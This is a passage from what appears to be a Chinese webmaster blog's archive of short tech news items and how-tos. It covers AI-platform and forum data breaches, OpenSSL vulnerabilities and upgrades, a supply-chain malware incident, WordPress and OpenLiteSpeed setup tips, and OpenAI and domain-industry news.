以上就是主机吧当年遇到的坑,希望可以帮到大家。不过相信现在淘宝的刷单情况应该会变少了,毕竟这几年整顿还是相当严的。 #### OmniGPT 聚合类 AI 平台遭黑客入侵 2 月 15 日消息,据外媒 HackRead 报道,有名为“Gloomer”的黑客在地下论坛 BreachForums 上发布帖子,声称自己成功入侵 AI 平台 OmniGPT,获取了一系列用户隐私信息,涉及 3 万名用户电子邮件、电话号码以及 3400 万条用户对话记录。 IT之家获悉,这一 OmniGPT 实际上是一款整合了各大厂商 API 的 AI 聚合平台,包含 ChatGPT-4、Claude 3.5、Perplexity、Gemini 等模型,号称可提供团队协作工具、数据管理和图片分析等。 外媒 HackRead 调查团队分析黑客公开的平台隐私信息,发现黑客所述内容属实,这些隐私信息涉及用户生活日常、云盘分享链接,账号信息、账单信息和 API 密钥、学生文凭、“超过 8 千个电子邮件地址”等。 至于黑客如何窃取这些数据,外媒表示目前尚不清楚,但可以确认的是,这些数据来自全球各地的 OmniGPT 用户,因此相关平台用户应当尽早确认自己在平台中上传了哪些数据信息,同时提高警惕避免遭到黑客后续钓鱼攻击。 #### OneSignal Push Notifications插件:免费实现wordpress博客订阅更新推送功能 OneSignal Push Notifications插件是一家国外的推送服务网站,可以让你的wordpress博客实现用户主动订阅,内容更新自动推送至浏览器的功能。 主机吧博客目前也在用,非常好用,所以推荐给大家。 因为是英文,不懂英文的,推荐大家用谷歌浏览器打开,然后用网页翻译即可。 注册 OneSignal 账号 我们必须注册一个OneSignal账号,才可以使用他们的推送服务。访问 OneSignal 官方 https://onesignal.com/ ,点击右上角的 Sign Up 按钮,即可进入注册界面: 填写邮箱、密码和名称,点击 Create Account 按钮完成注册。 创建一个应用 使用你刚才注册的账号登录以后,就可以在后台创建应用,点击下图的 NEW APP/WEBSITE 按钮,跳转页面,Name of your app or website:网站名称 ; What platform do you wish to use for this app? You can set up more later.选:web push 下一步,点击 NEXT,然后按照下图选择WordPress: 设置网站名称、网址和上传一个默认图标,然后点击左下角的 SAVE 按钮: 保存了以后,就会看到下图界面,里面有一个 APP ID 和 APP KEY,复制下来,稍后我们要用到的。 通过上一步,我们已经创建了浏览器推送,但是针对苹果浏览器 Safari ,还需要进一步设置。在应用列表,点击应用的名称,进入到管理界面。 点击 Settings ,在 Platforms 下面可以看到,这里面还有很多需要设置的推送平台,我们这里已经设置了ALL浏览器, 点击 Apple Safari 后面的那个图标: 在弹出的对话框中,可以设置网站名称、网址,还可以设置一个图标,保存以后,就可以看到一个 Web ID,这个很重要,我们后面要用到的,建议复制下来备用。 到这里,我们需要的浏览器推送的平台已经设置好了,如果你需要设置更多的平台,请自己去设置,这里就不再做介绍了,一般我们使用浏览器推送就可以了。 安装和配置 OneSignal 推送插件 OneSignal Push Notifications 是一个 OneSignal 开发的WordPress插件,专门用来对接 OneSignal 服务的。我们可以在WP后台插件安装界面搜索 OneSignal Push Notifications 进行在线安装,可以直接在主机吧文章下面下载。 安装并启用插件以后,在WP后台左边菜单的最底部,可以看到 OneSignal Push 菜单,点击进入就可以看到如下的设置界面。该插件不支持语言包汉化,所以只有简单在图片标注一下中文了。 我们注意一下第一个图片的 Account Settings 部分,这里有三个选项,需要填写一些API信息的。这就是我们上面提到的 APP ID 、APP KEY(REST API KEY)和 Safari Web ID,将它们分别填入即可,其他选项请尽可能参照图片设置: #### OpenAI 2000万美金买下Chat.com域名 OpenAI 宣布成功收购了 Chat.com 这一域名,并将其重定向至其人工智能聊天机器人 ChatGPT,预估金额在1500-2000万美金。这一收购进一步丰富了 OpenAI 在网络领域的高端域名资产。 Chat.com自1996年注册以来,已经成为互联网上较为知名的老牌域名之一。去年,有报道称,HubSpot 的联合创始人兼首席技术官 Dharmesh Shah 以1550万美元的价格购入了这一域名,成为历史上第二高的域名交易之一。Shah 在去年3月宣布,他已经将 Chat.com 出售给了一位未透露姓名的买家。 近日,他在社交平台 X 上确认,OpenAI 正是这位买家,并暗示他可能是以 OpenAI 的股份作为交易对价。不过,从目前来看,Chat.com 的域名并未发生任何改变,这意味着 OpenAI 并没有将 ChatGPT 托管在该域名下,因此此次收购可能并不会影响其品牌形象或市场定位。 OpenAI 方面也未透露此次收购的具体金额,不过市场预估应该在2000万美元左右,此次收购不仅是 OpenAI 在品牌扩展上的一步重要棋子,也进一步凸显了其在人工智能行业的地位。随着 AI 技术的不断发展,OpenAI 正积极布局,增强其市场竞争力。 #### OpenAI 也要做搜索引擎了,不过国内应该无缘 5月6日 消息:OpenAI 据报道正在开发其名为 ChatGPT 的 Google 替代品,该搜索引擎即将发布。根据 Y Combinator 的 Hacker News 社区最近的一篇帖子,该公司注册了一个新的域名 “search.chatgpt.com”,并获得了安全证书,表明 ChatGPT 驱动的搜索引擎即将发布。然而,目前访问该网址时显示 “未找到”。 OpenAI 的首席执行官 Sam Altman 曾是风险投资公司 Y Combinator 的前总裁,而 Y Combinator(YC)是 OpenAI 的早期投资者之一。 尽管这可能只是巧合,但也可能暗示 OpenAI 的第一个类似 Google 搜索的将在接下来的几天正式发布。根据 AI 影响者 Pete Huang 在 X 上的一篇帖子,ChatGPT 搜索引擎可能会在5月9日推出,还有其他几份报告也指向 ChatGPT 搜索引擎在接下来的几天可能会发布 ChatGPT 搜索引擎是一种将 Google 等网络搜索引擎和 ChatGPT 的生成式人工智能功能相结合的产品。当用户提出问题或输入查询时,ChatGPT 搜索引擎可能会提供包括生成式人工智能内容和相关网页在内结果,类似于 Perplexity AI。 这意味着用户不仅可以获得关于网络上所有相关信息的生成式人工智能摘要,还可以得直接的信息来源,适用于那些需要比摘要更多信息的用户。目前,Google 在搜索引擎业务中占据强势地位,市场份额近90%,其次是微软的 Bing 搜索引擎。Google 一直在进行人工智能功能的实验。与 ChatGPT 等生成式人工智能聊天机器人不同,OpenAI 在搜索引擎中可以加入广告,为公司创造新收入来源。 ChatGPT 搜索引擎的用户界面可能因设备而异。在桌面上,网页搜索结果和生成式人工智能摘要可能会并排显示,而在智能手机上可能会一个接一个地显示。一个很好的例子是微软的 C o p i l o t,它由 GPT-4和 Bing 搜索引擎驱动。 国外的搜索引擎由于没有内容过滤,在国内基本是出一个被屏蔽一个,OpenAI 出的搜索引擎也不例外。 #### OpenAI 将停止国内API连接 6月25日凌晨,有部分开发者收到了OpenAI的信,“根据数据显示,你的组织有来自OpenAl目前不支持的地区的API流量。从7月9日起,将采取额外措施,停止来自不在OpenAI支持的国家、地区名单上的API使用。” 但这位网友表示,他只在美国和乌克兰的第聂伯罗两个地方使用,都是在白名单上的,还是被无理由禁止。 并且当他试图去联系OpenAI的真人客服时,得到的却是一封AI回复的信件是“对不起,我们没有在你所在的地区进行运营。” 不只是他一个人,在西班牙、瑞士的开发人员也面临了禁止使用其API。但根据名单上来看,这两个国家是支持的。 一家SaaS公司也没能幸免,因为他们在提供服务时,可能会有OpenAI禁止的国家、地区用户来访问其API。所以,连这家公司也给封了,确实挺无辜的。 有人指出,出现这种情况的原因,可能与互联网封锁的范围扩大有关,然后AI自动检测可能出现了问题。 或者OpenAI得到了一些政策上的压力,开始严格执行封禁行动。所以,只要你接到了这封信,基本上就会被禁止使用API了。 目前国内流量是在OpenAI不支持名单中,之前检查并不严,对于一些从香港澳门的连接是开放的,而从7月9日起,可能更严格了,国内套壳OpenAI的AI网站可能有面临无法使用的风险了。 #### OpenAI 爬虫 gptbot 频繁抓取人体3D模型网站 导致网站瘫痪 近日,乌克兰一家专注于人体3D模型的网站 Trilegangers 遭遇了严重的流量攻击,导致其服务器瘫痪。该网站为3D艺术家和游戏开发者提供丰富的人体3D模型数据,但因 OpenAI 的爬虫 GPTBot 的频繁抓取而陷入困境。 据 Trilegangers 的工作人员透露,尽管网站在使用协议中明确禁止未经授权的抓取和使用,但由于未正确设置 robots.txt 文件来阻止爬虫的访问,最终导致服务器负荷过重。根据服务器日志,OpenAI 的 GPTBot 爬虫通过600多个不同的IP地址发起了数以万计的请求,使得网站无法正常运作,类似于遭遇了分布式拒绝服务(DDoS)攻击。 OpenAI 在其爬虫说明中提到,若网站不希望 GPTBot 抓取内容,需在 robots.txt 文件中进行设置。然而,Trilegangers 并未意识到这一点,从而导致了当前的窘境。尽管 robots.txt 文件并不是法律要求,但如果网站已经声明禁止未经授权使用,GPTBot 的抓取行为仍可能违反相关规定。 此外,由于使用亚马逊 AWS 服务器,Trilegangers 在带宽和流量上的消耗也急剧上升,给其带来了额外的费用压力。为应对这一突发事件,Trilegangers 已经采取措施,设置了正确的 robots.txt 文件,并通过 Web应用防火墙 屏蔽了包括 GPTBot 在内的多种爬虫的访问,这一做法预计将有效缓解服务器负担,保障网站的正常运作。 OpenAI 爬虫的UA为: Mozilla/5.0 (compatible; GPTBot/1.0; https://openai.com/gptbot) 我们可以利用百度云防护Web应用防火墙,拦截包含gptbot的UA。 #### OpenAI 网站跻身全球访问量最高的50个网站  2 月 7 日消息,OpenAI 的知名度在今年 1 月初还仅限于科技圈内,但伴随着 ChatGPT 的全球火爆,OpenAI 进入公众视野。OpenAI 自推出 ChatGPT 预览版之后,网站访问量快速攀升,目前已跻身全球 TOP50 网站。 OpenAI 网站在去年 11 月的全月访问量为 1830 万,主要访问人群是技术社区。而在今年 1 月份,该网站的访问量突破了 6.72 亿,增长了 3572%。 这一激增也意味着 OpenAI 的网站访问量超越了 AOL、Zoom 和 AT&T 等巨头。根据 SimilarWeb 分析,该数字还意味着该公司现在在计算机电子和技术类别中排名第一。 访问 OpenAI 网站的用户中,92% 是奔着 ChatGPT 来的。其中来自美国和印度的访客数量超过 7000 万次,占比超过 20%。 #### OpenAI 起诉“open.ai ”域名所有者商标侵权,网站名为“Open AI” 8 月 8 日消息,据彭博社消息,知名 AI 公司 OpenAI 对一家名为 Open Artificial Intelligence(开放人工智能)且拥有域名 www.open.ai 的公司提起诉讼,声称该名称侵犯了 OpenAI 商标,并造成消费者混淆。 该诉讼称,由总裁 Guy Ravine 领导的开放人工智能公司一直在误导客户,让他们相信自己与 OpenAI 及其流行产品(如 ChatGPT)有关联。开放人工智能公司在 2015 年开始运营后,采用了“Open Artificial Intelligence”的名称。“这种深思熟虑的选择破坏了 OpenAI 在美国专利商标局注册商标的努力。” 主机吧访问 www.open.ai 域名发现,该网站采用了 Open AI 的大标题,只是比 OpenAI 多了一个空格。 从具体用途来看,该网站看起来只是一个搜索图库,可以查找由 AI 生成的图像。 报道称,该诉讼旨在结束开放人工智能公司未经授权使用“开放人工智能”名称的行为,并寻求适当的法律补救措施。 #### OpenAI自研浏览器 挑战谷歌Chrome浏览器 据《The Information》报道,OpenAI 正计划通过推出一款基于 AI 聊天机器人的自研浏览器,向谷歌的搜索市场发起正面挑战。这一举措凸显了 OpenAI 在搜索领域的野心,同时也是其扩展生态系统的重要一步。 知情人士透露,OpenAI 正与康泰纳仕、Redfin、Eventbrite 和 Priceline 等平台商讨合作,拟在旅行、食品、房地产和零售等领域提供 AI 驱动的搜索服务。此外,OpenAI 还考虑为三星设备提供 AI 功能,进一步扩大其在硬件领域的影响力。 OpenAI 本月初在 ChatGPT 中新增了搜索功能,正式进军搜索领域。这一功能使用第三方搜索技术,并结合合作伙伴直接提供的内容,为用户快速提供最新信息及相关链接。其背后的技术依托于微调后的 GPT-4模型,目前已向 ChatGPT Plus 和 Team 用户开放,未来将逐步覆盖企业、教育机构和免费用户。 与此同时,OpenAI 已与包括美联社、《金融时报》、赫斯特、《时代》杂志等在内的众多新闻出版商达成合作,收集搜索功能的反馈,允许合作伙伴选择是否出现在搜索结果中。这种与内容提供商的广泛合作,不仅增强了 OpenAI 的内容资源库,还进一步巩固了其在搜索市场中的竞争力。 随着 OpenAI 搜索功能的不断迭代,其目标已不仅限于挑战谷歌搜索的主导地位,还意在与微软 Bing 和其他 AI 驱动的搜索服务如 Perplexity 展开竞争。若推出自研浏览器,将为 OpenAI 提供更强大的入口级产品,同时也为用户带来一种全新的搜索体验。 #### OpenLiteSpeed 中rolling Size设置是指什么 在OpenLiteSpeed中,"Rolling Size"设置是指配置轮询(Rolling)缓存大小的选项。轮询缓存是一种机制,用于缓存动态生成的内容,以提高网站性能和响应速度。 "Rolling Size"设置允许您指定轮询缓存的大小,即可以存储在内存中的缓存项的数量。当缓存达到指定的大小时,旧的项目将被替换或清除,以便为新的项目腾出空间。 通过调整"Rolling Size"设置,您可以控制缓存的大小,从而影响网站的性能和响应速度。较大的设置可以缓存更多的内容,提高响应速度,但可能会占用更多的内存资源。较小的设置可以减少内存使用,但可能会影响响应速度。 请注意,具体的设置方法和选项可能因OpenLiteSpeed的版本和配置而有所不同。建议参考OpenLiteSpeed的官方文档或配置指南以获取更详细和准确的信息。 #### OpenLiteSpeed:提高wordpress访问速度与减少wordpress占用服务器配置 一说到wordpress很多小伙伴第一印象就是臃肿,运行wordpress非常吃服务器配置,而且访问慢卡。 不过如果你的服务器安装的是OpenLiteSpeed,那么就不存在以上问题了。 OpenLiteSpeed是一个类似于apache、Nginx的轻量级、高性能WEB服务器引擎。它附带了服务器端的LSCache模块,具有高性能缓存功能,能有效提高WordPress网站的加载速度。 性能对比如下: 目前,国内宝塔面板已经支持手动安装OpenLiteSpeed,只需要进入软件商店,运行环境即可找到OpenLiteSpeed。 安装前需要先把Apache 和 Nginx卸载掉,然后安装即可,如果直接从Nginx转到OpenLiteSpeed,可能会有403问题,主机吧这边网上查了半天解决办法也没解决。建议想用OpenLiteSpeed的站长,从安装宝塔开始就装OpenLiteSpeed,否则容易出问题。 使用OpenLiteSpeed后,一定要配合LiteSpeed Cache 插件使用,可以极大提高wordpress的速度。 #### OpenSea 遭黑客攻击,超 170 万美元 NFT 被盗 2 月 21 日消息,NFT(Non-Fungible Token,非同质化代币)在过去一年里迅速流行起来。 据美国消费者新闻与商业频道 CNBC 报道,NFT 市场 OpenSea 首席执行官 Devin Finzer 周六晚些时候表示,OpenSea 正在调查一起黑客攻击事件,部分用户价值 170 万美元(约 1077.8 万元人民币)的 NFT 被盗。 Finzer 表示:“到目前为止,有 32 个用户签署了来自攻击者的入侵,他们的部分 NFT 被盗。” IT之家了解到,Finzer 还澄清了黑客盗走价值 2 亿美元 NFT 的传言,称黑客“钱包里有 170 万美元的 ETH,这是通过出售部分被盗 NFT 得来的”。 此外,Finzer 称部分被盗的 NFT 已经归还。目前,OpenSea 估值已达 130 亿美元(约 824.2 亿元人民币),是 NFT 领域估值最高的公司之一。 #### OpenSSL 1.1.1 生命周期将在 9 月 11 日结束,要尽快升级 OpenSSL 1.1.1 将在2023年9月停止支持,官方发布警告敦促用户升级 OpenSSL 是一个广泛使用的开源套件,用于安全通信。其1.1.1版本于2018年9月首次发布,但由于官方为每个长期支持版本提供了5年的更新和维护,OpenSSL 官方博客最近警告称,OpenSSL 1.1.1的支持将在2023年9月结束,催促用户进行升级。 官方表示,用户必须在 9 月 11 日 OpenSSL 1.1.1 生命周期结束之前,升级到更新版本的 OpenSSL。目前最新版本的 OpenSSL 3.1 在 2025 年 3 月 14 日前将得到官方支持,而长期版本 OpenSSL 3.0 的生命周期可达 2026 年 9 月 7 日。 据悉,OpenSSL 3.0 比起旧版本有许多重大变更,且并不完全兼容之前的版本。3.X 相对于旧版本的变更包括加入联邦资讯处理标准(FIPS)、使用 Apache License 2.0 开源授权,同时也弃用不少老旧 API。 官方表示大多数使用 OpenSSL 1.1.1 的软件,都只需要重新编译都可以正常运行,只是开发者会看到许多已弃用 API 的编译警告。在 OpenSSL 1.1.1 生命周期结束之前,用户需采取必要的行动,以确保能够得到官方的支持,确保安全性。 #### OpenSSL 3.2.0 正式版发布,客户端 QUIC 支持 / 证书压缩 / 支持原始公钥等 11 月 26 日消息,OpenSSL 3.2.0 版本现已发布,这是 OpenSSL 3.2 系列的首个通用版本,并包含许多新功能,下面列举一些重要更新: 默认 SSL / TLS 安全级别从 1 改为 2。 客户端 QUIC 支持,包括对多个流的支持(RFC 9000) TLS 中的证书压缩(RFC 8879),包括对 zlib、zstd 和 Brotli 的支持 确定性 ECDSA(RFC 6979) 除了对 Ed25519 和 Ed448 的现有支持外,现在还支持 Ed25519ctx、Ed25519ph、Ed448ph(RFC 8032) 支持 AES-GCM-SIV(RFC 8452) 支持 Argon2(RFC 9106)和线程池功能 HPKE(RFC 9180) 在 TLS 中使用原始公钥的能力(RFC 7250) 支持 TCP Fast Open(RFC 7413) 支持基于提供者的可插拔签名方案在 TLS 中的使用,允许第三方后量子和其他算法提供者将算法与 TLS 一起使用。 支持在 TLS 1.3 中使用 Brainpool 曲线。 支持 SM4-XTS 支持使用 Windows 系统证书存储作为可信根证书的来源。目前默认情况下尚未启用,必须通过环境变量激活。在未来的功能发布中可能会默认启用。 OpenSSL 是一个开放源代码的软件库,用于实现安全套接字层(SSL)和传输层安全性(TLS)协议。这些协议主要用于在网络应用程序中建立加密通道以保护数据的机密性和完整性。OpenSSL 支持各种操作系统,包括 Windows、Linux 和 macOS 等。 OpenSSL 提供了一系列工具和库,可用于实现 SSL/TLS 服务器和客户端、证书管理、加密和其他与安全相关的功能。它被广泛用于 Web 服务器、电子邮件服务器、即时通讯客户端等应用程序,以确保通信的安全。 除了提供基本的 SSL/TLS 功能外,OpenSSL 还支持许多其他密码学算法和标准,例如 RSA、DSA、ECC、AES、SHA-256 等。这使得 OpenSSL 成为了一个强大的工具,可以满足各种不同的安全需求。 #### OpenSSL CCS 注入漏洞是什么 如何修复 OpenSSL CCS注入漏洞概述 OpenSSL CCS注入漏洞是由于OpenSSL的ChangeCipherSpec设计缺陷导致的,被称为CCS注入漏洞。攻击者可以利用此漏洞发起中间人攻击,篡改或监听SSL加密传输的数据。 受影响的OpenSSL版本 受影响的OpenSSL版本包括: OpenSSL 1.0.1 through 1.0.1g OpenSSL 1.0.0 through 1.0.0l all versions before OpenSSL 0.9.8y 未受影响的版本包括: OpenSSL 1.0.1h OpenSSL 1.0.0m OpenSSL 0.9.8za 修复措施 针对Windows环境下的Apache和Nginx等使用OpenSSL的Web服务器,可以直接下载更新到最新版本的Web服务器来解决此问题。 对于Linux环境下的Nginx,可以使用ldd nginx命令检查是否使用了libssl.so和libcrypto.so的库,如果使用,直接升级OpenSSL即可。如果没有使用,那么需要重新编译Nginx。 对于Apache,如果是使用管理方式安装的,可以直接使用包管理升级OpenSSL。如果是自行编译安装的,需要检查Apache的编译参数,看是否指定了自己的OpenSSL目录。如果没有指定,也可以直接使用包管理升级OpenSSL。如果是在编译安装时使用了自己的OpenSSL目录而非系统的OpenSSL,那么需要升级对应目录的OpenSSL或重新编译Apache。 #### OpenSSL出现高危漏洞:容易遭黑客攻击致服务器崩溃 3月26日 消息:日前,OpenSSL 项目修复了一个高危漏洞,该漏洞允许黑客发送特制恶意请求完全关闭大量的服务器。 据悉,OpenSSL 是最广泛使用的软件加密库,提供了经过时间考验的靠谱的加密功能。 而在本周四,OpenSSL维护人员披露并修补了一个漏洞,当服务器收到未经身份验证的特制恶意的请求时,该漏洞会导致服务器崩溃。 CVE-2021-3449是一个拒绝服务漏洞,是空指针引用错误导致的。在建立安全连接的初始握手期间,黑客可以利用该漏洞发送恶意形式的重协商请求。 密码工程师Filippo Valsorda在推特上表示,这个漏洞可能在更早之前已经被发现了。 研究人员在3月17日报告了这一漏洞,并将其评为高危漏洞。诺基亚的开发者 Peter Kästle 和 Samuel Sapalski 开发了修复的补丁。 另外,OpenSSL还修复了一个单独的漏洞——CVE-2021-3450,在极端的情况下,该漏洞阻止应用程序检测和拒绝未经浏览器信任的证书颁发机构数字签名的TLS证书。 OpenSSL1.1.1h和更高版本容易受到攻击,而OpenSSL1.0.2则不受此问题的影响。官方建议,使用易受攻击的OpenSSL版本的应用程序尽快升级到OpenSSL1.1.1k。 #### OpenWRT论坛数据泄露,大量用户数据被盗 1月19日 消息:OpenWRT论坛是一个由热爱路由器替代开源操作系统的人组成的大型社区,该平台现在宣布了一起数据泄露事件。 OpenWRT论坛管理员在一份声明中,解释了发生了什么,以及暴露用户数据会给用户带来的风险。 站长之家了解到,攻击发生在美国当地时间周六凌晨4点左右,一个未经授权的第三方获得了管理权限,并复制了一个包含论坛用户详细信息和相关统计信息的列表。 据称,入侵者使用了OpenWRT管理员的帐户,论坛用户的电子邮件地址和帐号被盗。OpenWRT方面还补充说,他们认为攻击者无法下载论坛数据库,这意味着密码应该是安全的。 然而,为了安全起见,他们重置了论坛上的所有密码,并使项目开发过程中所有使用的API密钥失效。 用户必须从登录菜单中手动设置新密码,方法是提供他们的用户名并按照“获取新密码”的说明进行操作。建议那些使用GitHub凭据登录的人重置或刷新它。 另外,OpenWRT论坛的凭证与维基是分开的。目前,没有人怀疑维基证书已经被以任何方式泄露。 OpenWRT论坛管理员警告说,由于这次入侵暴露了电子邮件地址,用户可能会成为网络钓鱼攻击者的目标。 这意味着用户能会收到包含名字的网络钓鱼邮件。公告建议“不要点击链接,而是手动输入论坛的URL”。 OpenWRT是一个基于linux的、社区维护的固件项目,它为各种路由器提供定制软件。它适合那些想要解锁路由器支持的高级选项的爱好者。 此外,OpenWRT的维护者通常比路由器供应商更快地解决安全问题。由于运行自定义固件的设备数量更少,而且它们往往更安全,因此针对它们的攻击可能性更小。 然而,在路由器上加载自定义固件需要一定技术知识,而且往往会使设备的保修失效。 #### Opera欧朋浏览器支持网站使用与加密货币相关的 .Crypto顶级域名 4月2日 消息:Opera已经为Android版本更新了其轻量级浏览器,以便于用户访问用于加密货币交易相关的.crypto域名网站。 据报道,这家挪威软件制造商周一表示,Opera对.crypto的支持将“把区块链浏览体验提升到一个新的水平”。最重要的是,.Crypto并存在于全球域名系统中,也不被DNS监管机构ICANN和全球的DNS解析器所识别。 通过使用类似sendmemoneee.crypto域名连接到区块链,发送和接收加密货币变得更加容易,因为用户只需要记住一个域名名称(以.crypto结尾),而不是一个很长的钱包ID地址。 早在 2018 年 12 月,谷歌就在安卓浏览器中添加了一个内置加密钱包,随后又在桌面浏览器中添加了加密钱包。之后,谷歌又扩展了这一功能,允许使用加密货币进行购买。因此,添加一个简单的寻址系统是有意义的。(theregister) #### OPPO Sans 4.0 字体免费商用 不用担心被告侵权 10 月 23 日消息,OPPO 与汉仪字库联合开发的 OPPO Sans 4.0 字体于 10 月 18 日正式发布,搭载于 ColorOS 15 系统中,优化了整体笔划曲线。 目前 OPPO Sans 4.0 字体已在 OPPO 开放平台提供下载(点此下载),继续免费授权给全社会使用(含商用)。 据介绍,OPPO Sans 4.0 针对西文与数字造型的表现力进行了优化,中宫更加圆润饱满,端口更加开阔,字符特点更加鲜明,提高了造型上的表现力和屏幕上的阅读感受,更适合展示使用。 同时,针对高分辨率屏幕的显示特性,OPPO Sans 4.0 通过减小字锋、去出脚、均匀布白等方式,进一步提升整洁度与通透感。 OPPO Sans 4.0 使用条款: OPPO Sans 允许个人或企业免费使用,含商业用途,版权归 OPPO 广东移动通信有限公司所有。使用过程中,您应遵守以下条款,违者将会被追究法律责任: 1、不对字体进行改编或二次开发; 2、不对外售卖字体; 3、不向他方提供其他下载渠道; 4、不用于违法用途。 #### Optus 遭到大规模网络攻击,澳洲电讯发生数据泄露事件 10 月 4 日消息,据路透社报道,当地时间周二,澳大利亚最大的电信公司澳洲电讯(Telstra)表示,其遭遇了小型数据泄露。就在两周前,澳洲电讯主要竞争对手 Optus 遭受了大规模网络攻击。 澳洲电讯拥有 1880 万客户账户,相当于澳大利亚四分之三的人口。该公司表示,第三方机构的入侵暴露了部分可追溯到 2017 年的员工数据。 据当地媒体报道,澳洲电讯在一封内部员工邮件中称,受影响的现任和前任员工人数为 3 万人。 该公司发言人在一份声明中表示,被窃取的数据“非常基本”,仅限于姓名和电子邮件地址。这位发言人还指出:“我们认为,这些信息现在被泄露出来,是为了从 Optus 的漏洞中获利。” 澳洲电讯没有就受影响的人数或入侵发生的时间发表评论,但表示只影响现任和前任员工。 #### Oracle暂停俄罗斯所有业务 众所周知,Oracle是一款非常强大的数据库管理系统,主要应用于电信,金融等领域,早些年间几乎无可替代,这样的一个强大的软件居然也受政治因素影响,开始停止俄罗斯所有业务。 2022年3月2日,乌克兰副总理兼数字化转型部长Mykhailo Fedorov在推特上晒出了发给Oracle联合创始人兼首席技术官Larry Ellison、Oracle首席执行官Safra Catz和SAP首席执行官Christian Klein的两封信的副本。这两封信的诉求大同小异,要求这两家公司终止与俄罗斯的商业关系,以应对俄罗斯当前入侵乌克兰的行为。Fedorov在致Oracle领导层的信中表示:“面对俄罗斯联邦发动的战争,乌克兰现正站在捍卫民主和自由原则的前线。”“IT 行业始终支持倡导责任和民主的价值观。我相信贵国也信奉这些价值观。”这位乌克兰领导人接着表示,乌克兰“呼吁贵公司终止与俄罗斯联邦的任何关系,停止与/在俄罗斯联邦开展业务,尤其是停止为Oracle产品提供支持、维护和软件更新,直至冲突得到解决,公平秩序得到恢复。”Fedorov在致SAP领导层的信件中表示:“2022年的现代技术也是我们保卫国家和公民的武器,这就是为什么我们需要你们的支持。”“我们希望你们不仅会听到心声,还会尽一切可能保护,以乌克兰、欧洲乃至整个世界免受俄罗斯的血腥侵略。[......]因此,我呼吁你们停止提供SAP服务和产品,直至普京对我们国家发动的攻击结束。” Oracle随后发推文称:“为了Oracle在全球各地的150000名员工的利益,为了支持乌克兰民选政府和乌克兰人民,Oracle公司已经暂停了在俄罗斯联邦的所有业务。”Fedorov回应道:“乌克兰的所有自由人民满怀感激之情!”这位高官还在3月2日向多家游戏开发商发布了一封公开信,要求暂时封禁所有俄罗斯和白俄罗斯的帐户持有人,包括暂时禁止他们参加国际电竞活动。周二,苹果公司表示已暂停在俄罗斯销售产品,对销售渠道的出口已停止,俄罗斯国家控制的RT News和Sputnik News媒体应用程序在境外已从应用程序商店下架。此外,这家iPad和iPhone制造商表示:“作为为乌克兰公民提供的一项安全和预防措施,我们已经在乌克兰的苹果地图(Apple Maps)中禁用了交通和实时事件。” 乌克兰还要求互联网管理机构吊销俄罗斯的顶级域名(TLD)及其SSL证书。 #### org域名出售给营利机构维护 或将至价格上涨 11月15日 消息:据domainnamewire报道,国际互联网协会(ISOC)正式将维护 .org 顶级域名的公益注册机构(PIR)出售给了私募股权机构 Ethos Capital。 据悉,PIR在 2018 年创造了1. 01 亿美元的收入,并为ISOC贡献了近 5000 万美元。 2017 年,它向又向ISOC捐助了 7400 万美元。6 月 30 日,负责管理互联网上所有域名的非营利组织 ICANN还取消 .org 域名的价格上限(以前非常便宜),这些都使这笔交易更有价值。 据业内人士分析,尽管ISOC自身可能不想涨价,但Ethos Capital作为私募股权机构肯定会想办法最大限度地提高PIR的价值,这也意味着 .org 顶级域名价格可能会上涨。 不过,ISOC在一份新闻稿中指出,该项交易对ISOC和PIR都有巨大的好处,将有助于ISOC通过比目前更稳定、多样化和可持续的财政资源保障其未来,并在更大的范围内推进其为每个人建设互联网的愿景。PIR将继续扩大其使命和重要工作,包括保持.ORG可访问性和合理定价的目标,同时进一步加强和深化其对.ORG社区的承诺。 PIR CEO Jon Nevett表示,公司的目标一直都是让.ORG可访问且价格合理,PIR过去在价格上做出了合理的决定,未来将继续贯彻这种精神。Jon Nevett承诺,永远不会大幅提价,因为我提价会损害注册人和注册服务商利益。 不管如何,各位站长还是趁现在续费一波吧! #### org域名或将涨价 ICANN允许域名年费不受限制地涨价 互联网域名管理机构 ICANN 解除了 .org 域名年费上涨限制,允许不受限制的涨价。今年四月,ICANN 公布了涨价提议,征求公众意见。但尽管有大量的反对意见,ICANN 依然站在域名注册商一边,允许域名费用无限制上涨。 目前 .org 等域名年费允许最高每年涨价 10%。这不是第一次有人提议取消这一限制,上一次是在 2006 年,当时因为遭到了公众的强烈反对而作罢。 ICANN 看起来认为这个历史早已过去了。对于 .info、.biz 和 .asia 等顶级域名,也存在类似提议。这也意味着其它更流行的顶级域名如 .com 和 .net 都可能会跟着涨价。 #### Passwordstate密码管理器遭黑客入侵 在客户系统上部署恶意软件 The Record 报道称,某神秘黑客攻破了企业密码管理器应用程序的更新机制,并在其用户设备(大多数为企业客户)上部署了恶意软件。今天早些时候,澳大利亚软件公司 Click Studios 已经向 2.9 万名客户发去了电子邮件通知。由波兰科技新闻网站 Niebezpiecznik 获得的通告副本可知,带有恶意软件的更新包,在 4 月 20 ~ 22 日期间持续传播了 28 个小时。 官网介绍(来自:Click Studios) 丹麦安全公司 CSIS 今日发布了针对该供应链恶意软件攻击的分析,指出攻击者迫使 Passwordstate 应用程序下载了另一个名为“Passwordstate_update.zip”的压缩包,其中包含了一个“moserware.secretsplitter.dll”动态链接库文件。 在受害者机器上安装后,该 DLL 文件将会尝试 ping 通远程的命令与控制服务器,而后服务器端会给出特定的响应,比如检索其它有效负载。 从 UTC 时间 4 月 20 日 20:33、到 4 月 22 日 00:30,恶意软件一共持续了 28 个小时。然而攻击者的嗅觉也相当灵敏,在发现露馅时就立即关闭了命令与控制服务器。 调查受阻的安全人员,暂时只发现 Windows 版本的 Passwordstate 恶意软件。至于攻击者还执行了哪些额外的骚操作,目前还无法断定。 邮件截图 从攻击者破坏的软件性质来判断,黑客显然希望从受感染的系统中捞取机密信息,甚至可能已经获得了对客户密码存储的完全访问权限。 正如 SentinelOne 首席威胁研究员 Juan Andres Guerrero-Saade 今日在 Twitter 上指出的那样,当前已有某些工具能够破解 Passwordstate 加密库并恢复明文密码。 一旦泄露相关密码,许多企业客户的内网邮件、账号、防火墙、虚拟专用网、交换机、路由器、网络网关、以及本地存储系统,都将面临相当严重的威胁。 作为应对,Click Studios 已经发布了一个名叫 Moserware.zip 的修复程序包(传送门),并建议 29000 家企业立即更换所有密码。 #### PayPal前CEO:比特币是有史以来最大骗局 新浪美股讯 北京时间 25 日消息,美国金融科技界传奇人物、Personal Capital创始人、前PayPal和Intuit公司CEO比尔-哈里斯周二表示,比特币是一个巨大的“拉高出货”骗局,其规模之大前所未见。 